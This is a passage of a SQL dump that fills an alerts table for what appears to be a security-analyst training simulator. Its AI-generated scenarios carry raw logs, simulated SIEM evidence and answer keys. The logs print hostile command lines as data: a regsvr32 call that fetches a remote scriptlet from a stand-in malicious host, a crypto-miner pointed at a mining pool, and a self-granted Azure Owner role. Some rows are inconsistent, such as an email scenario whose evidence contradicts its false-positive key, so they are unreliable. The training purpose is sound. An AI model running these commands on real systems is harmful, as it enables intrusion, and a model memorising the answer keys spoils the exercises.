host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used for executing remote script leveraging regsvr32\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of regsvr32 to execute a remote script is indicative of an attempt to move laterally within the network.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct 
scrobj.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(748, 'Exposed S3 Bucket Detected, Potential Data Exposure', 'high', 'AWS GuardDuty', 'An S3 bucket was found to be publicly accessible, which could lead to unauthorized data exposure.', 'Data Exfiltration', 'T1530', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"bucket_policy_change\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"AWS\",\"username\":\"aws-user\",\"hostname\":\"N/A\",\"request_body\":\"{\\\"Action\\\":\\\"s3:GetObject\\\",\\\"Resource\\\":\\\"arn:aws:s3:::mybucket/*\\\",\\\"Effect\\\":\\\"Allow\\\",\\\"Principal\\\":\\\"*\\\"}\"}', '2026-01-11 12:33:53', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP previously reported for suspicious cloud activity\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"{\\\"Action\\\":\\\"s3:GetObject\\\",\\\"Resource\\\":\\\"arn:aws:s3:::mybucket/*\\\",\\\"Effect\\\":\\\"Allow\\\",\\\"Principal\\\":\\\"*\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Config\",\"verdict\":\"malicious\",\"details\":\"Bucket policy allows public access to all objects\"}}],\"expected_actions\":[\"block_ip\",\"close_bucket_policy\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Public access to S3 buckets can expose sensitive data. 
Immediate action required to close access.\"}', 'Advanced', 'DLP', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(749, 'Encoded PowerShell Command Execution Detected in GCP', 'critical', 'Google Cloud Security Command Center', 'An encoded PowerShell command was executed on a Google Cloud VM, indicative of possible malicious activity.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:15:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"N/A\",\"username\":\"admin\",\"hostname\":\"GCP-VM-01\",\"command_line\":\"powershell -enc aGVsbG8gd29ybGQ=\"}', '2026-01-10 13:25:27', '2026-02-16 18:04:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the GCP VM\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are often used to evade detection and execute malicious payloads.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc 
aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc 
aGVsbG8gd29ybGQ=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(750, 'Suspicious Email Detected - Potential False Positive', 'medium', 'Proofpoint Email Gateway', 'An email containing a link to an external website was flagged as suspicious but appears to be from a trusted source.', 'Phishing', 'T1566', 0, 'Closed', 42, '{\"timestamp\":\"2026-01-11T10:25:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.20\",\"username\":\"employee@example.com\",\"hostname\":\"N/A\",\"email_sender\":\"trusted.source@example.com\",\"request_body\":\"Please review the attached document: https://example-trusted-site.com/document\"}', '2026-01-10 11:44:36', '2026-03-12 12:15:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted email provider\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://example-trusted-site.com/document\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL belongs to a trusted and verified domain\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"trusted.source@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"clean\",\"details\":\"Email address registered to a known and trusted organization\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Despite initial suspicion, the email was verified to be from a trusted source with clean OSINT results.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected - Potential False Positive\",\"date\":\"2026-02-01T20:32:22.397Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(751, 'Potential Crypto Mining Activity on AWS EC2 Instance', 'high', 'AWS GuardDuty', 'GuardDuty detected anomalous CPU usage patterns consistent with crypto mining on an EC2 instance. This activity is often indicative of unauthorized resource usage.', 'Malware', 'T1496', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:23:45Z\",\"event_type\":\"anomalous_usage\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.78\",\"username\":\"ec2-user\",\"hostname\":\"ec2-192-168-1-10.compute-1.amazonaws.com\",\"command_line\":\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\"}', '2026-01-10 12:48:36', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to AWS EC2 instance\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 547 times for crypto mining activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known command line for crypto mining operations\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known crypto mining command indicates unauthorized resource usage.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(752, 'Suspicious IAM Privilege Escalation in Azure', 'critical', 'Azure Sentinel', 'A user account was detected attempting to assign itself higher privileges through an unusual method. This could indicate a compromised account.', 'Lateral Movement', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"52.233.123.45\",\"username\":\"john.doe\",\"hostname\":\"azure-vm-01\",\"command_line\":\"az role assignment create --assignee john.doe --role Owner\"}', '2026-01-10 17:50:25', '2026-02-16 18:03:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Azure VM\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"52.233.123.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee john.doe --role Owner\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used for unauthorized privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command line used is indicative of unauthorized privilege escalation.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role Owner\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role Owner\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role Owner\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role 
Owner\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role Owner\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(753, 'Exposed S3 Bucket Detected in AWS', 'medium', 'AWS CloudTrail', 'A public read/write permission was detected on an S3 bucket, potentially exposing sensitive data.', 'Data Exfiltration', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:42:05Z\",\"event_type\":\"bucket_policy_change\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"13.54.32.123\",\"username\":\"admin\",\"hostname\":\"cloud.aws.local\",\"request_body\":\"{\\\"Bucket\\\":\\\"my-sensitive-bucket\\\",\\\"Policy\\\":\\\"PublicReadWrite\\\"}\"}', '2026-01-09 16:19:33', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of AWS management console\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"{\\\"Bucket\\\":\\\"my-sensitive-bucket\\\",\\\"Policy\\\":\\\"PublicReadWrite\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Exposing S3 bucket with public read/write permissions\"}}],\"expected_actions\":[\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Public read/write permissions on a sensitive S3 bucket are a security risk.\"}', 'Intermediate', 'CLOUD', 5, 1, 'OT_ICS', NULL, NULL, 